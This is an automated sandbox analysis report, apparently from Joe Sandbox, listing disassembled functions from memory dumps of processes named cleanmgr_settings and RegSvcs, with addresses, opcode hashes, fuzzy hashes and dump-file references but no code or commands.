                                                Function 000007FE88C680E0 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e037d4b89864b98723c91de719be6dd14e3c441c4c65cc9d8da48bd4fc0c475a
                                                • Instruction ID: 1a528ffbb6a03acaf343dec4ad4c9f4d23f9c0b4c68ae24374b193153af9e778
                                                • Opcode Fuzzy Hash: e037d4b89864b98723c91de719be6dd14e3c441c4c65cc9d8da48bd4fc0c475a
                                                • Instruction Fuzzy Hash: 5441C670918A5D8FEF98EF98D494BEDBBB1FB58301F10006ED40DE72A5DA35A941CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C67F0A Relevance: .1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22707b42374a6716db05a8e9ab55731c3f152d88669e10893d5e7151f44a2d63
                                                • Instruction ID: 2c5d05ebb4220ce05ac17bdd2686bcbd31d5efce62ee035fc2d1309f6e583b9f
                                                • Opcode Fuzzy Hash: 22707b42374a6716db05a8e9ab55731c3f152d88669e10893d5e7151f44a2d63
                                                • Instruction Fuzzy Hash: 9231813091868D4FE742EB68D8557EDBFB2FF8E200F5001A6D04DE32A3DA286E11C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C702DE Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbb50505ba044485506d1c50cfd0d6c5e617997887fccd5e5ada9e2a367f299d
                                                • Instruction ID: 1cbe7a95e5aba68fe7954dcb30c236c6fc65bf63b8c6600aa47c07f5174b033b
                                                • Opcode Fuzzy Hash: fbb50505ba044485506d1c50cfd0d6c5e617997887fccd5e5ada9e2a367f299d
                                                • Instruction Fuzzy Hash: 2F31C63195D68A8FDB01EF68C8417FE7BF0FF06350F1411A6D448E32A6C678A954C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C646D7 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 901f46a969f0c74c3b5a2b5324f8b807efdc4c3d8d044d5f00bf63de41e7f9df
                                                • Instruction ID: 5cadf4f3ea7175b14bd05f2b54cfa211058f62a7e0e741e60e3d866e879fea73
                                                • Opcode Fuzzy Hash: 901f46a969f0c74c3b5a2b5324f8b807efdc4c3d8d044d5f00bf63de41e7f9df
                                                • Instruction Fuzzy Hash: 3B311C30D1955A8FEB95EF68C8947ECB7B5FB54340F1011B9D80DE32A6DA74AB808F41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60358 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56420c6212c62f190b2a4d9a001f7b39784320ad14a1eb52d347e990bb8788bc
                                                • Instruction ID: 15ffde2aefd9cb15e10b546174e4b24756e0bc55976212f7afa880a51985a8be
                                                • Opcode Fuzzy Hash: 56420c6212c62f190b2a4d9a001f7b39784320ad14a1eb52d347e990bb8788bc
                                                • Instruction Fuzzy Hash: 5B115E30A18A4E8FDF85EF58D441AEEBBF1FF59310F05146AE40EE3295CA74A960C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C68050 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6962df7c239425467bc738aed1e52ce2b644203ce616f09bf75e7269fbe8b3e2
                                                • Instruction ID: e19fb642794ae9e2b8d1341d3f8240f2c618c84ba717101605867097f13e6a52
                                                • Opcode Fuzzy Hash: 6962df7c239425467bc738aed1e52ce2b644203ce616f09bf75e7269fbe8b3e2
                                                • Instruction Fuzzy Hash: 51016530A08A4D8FDF80EB9CD444AEEBBF1FB5D300F04046AE008E3261CA74A850CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C67179 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1da2b52717fea570e015b520e169d5b89de4c24163a39ec58e5389794c349baf
                                                • Instruction ID: 175aba419deeacb5dcd1e5fcd562147af61ba192a460bfac85acdf887b95c138
                                                • Opcode Fuzzy Hash: 1da2b52717fea570e015b520e169d5b89de4c24163a39ec58e5389794c349baf
                                                • Instruction Fuzzy Hash: 97113C7094868D8FCB85EF58C854AA97BF0FF29300F0505AAE41CD7262C734A994CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C6D025 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 634886031469e5479c23fe5064f87deaef0b3eeccfe151c590edb682be19d162
                                                • Instruction ID: 8ddaa5673847767fedf451d5b13b30690f05c4cfa479f27289cc739123b6e974
                                                • Opcode Fuzzy Hash: 634886031469e5479c23fe5064f87deaef0b3eeccfe151c590edb682be19d162
                                                • Instruction Fuzzy Hash: 0A1100709196598FEB90EF28C884BA9B3B1FB14751F1441A8940CD32A5DA349FC4CF02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60628 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c8735c1ca8cf9e80717ced6a149953ecf5adfb5e4e70bd89d80789638f7e565
                                                • Instruction ID: ff47cf3d684b246e5ed2c8f5f90fb6f8c97a93d1eff12d30300be97780d9ea02
                                                • Opcode Fuzzy Hash: 9c8735c1ca8cf9e80717ced6a149953ecf5adfb5e4e70bd89d80789638f7e565
                                                • Instruction Fuzzy Hash: 75F08C30828A8D9FEB41FF68C4087A97BE0FF04308F4004AAE80DD21A1D634A6A0CB42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 000007FE88C6F248 Relevance: 1.9, Strings: 1, Instructions: 675COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F!a
                                                • API String ID: 0-3215075102
                                                • Opcode ID: 0e5931942873f8189acd373dd065aa8afbd4397670720b0e089bde314c705893
                                                • Instruction ID: d5246ae856c5114c16ba2f32e045ea2767b7bb393de2cf63881203ba6c5a03df
                                                • Opcode Fuzzy Hash: 0e5931942873f8189acd373dd065aa8afbd4397670720b0e089bde314c705893
                                                • Instruction Fuzzy Hash: DC423930E1461D8FDB18DFA8C890AEDBBF2FF98350F148169E419E7359D634A981CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000007FE88C60535 Relevance: 7.6, Strings: 6, Instructions: 83COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1039657741.000007FE88C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE88C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe88c60000_cleanmgr_settings.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: a_^X$a_^Z$a_^h$a_^j$a_^l$a_^n
                                                • API String ID: 0-4203160459
                                                • Opcode ID: 6d3259bbecf1d073542c61ff53b361589fc8a7b33297f038d025779d621b2c81
                                                • Instruction ID: 8ae5913605ededb6845d44da923d04cfcfb1ef8979407e38a49f20f12654e273
                                                • Opcode Fuzzy Hash: 6d3259bbecf1d073542c61ff53b361589fc8a7b33297f038d025779d621b2c81
                                                • Instruction Fuzzy Hash: C3210567D0C1B246E100B779B5457ED6764ABC5770F2C083AE0FCAD053E84BA28DC6D6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:0.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:33.3%
                                                Total number of Nodes:6
                                                Total number of Limit Nodes:1
                                                execution_graph 53268 85f900 LdrInitializeThunk 53276 8b6c39 53277 8b6c45 __87except 53276->53277 53279 8bee06 _vwprintf 53277->53279 53281 85fea0 LdrInitializeThunk 53277->53281 53280 8b6c66 __87except 53281->53280

                                                Executed Functions

                                                Function 008600C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00860048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 13 860048-86005d LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00860078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 14 860078-860090 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1 85f9f0-85fa05 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 85f900-85f918 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2 85fad0-85fae5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3 85fae8-85fafd LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 85fbb8-85fbcd LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 85fb68-85fb7d LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 7 85fc90-85fca5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
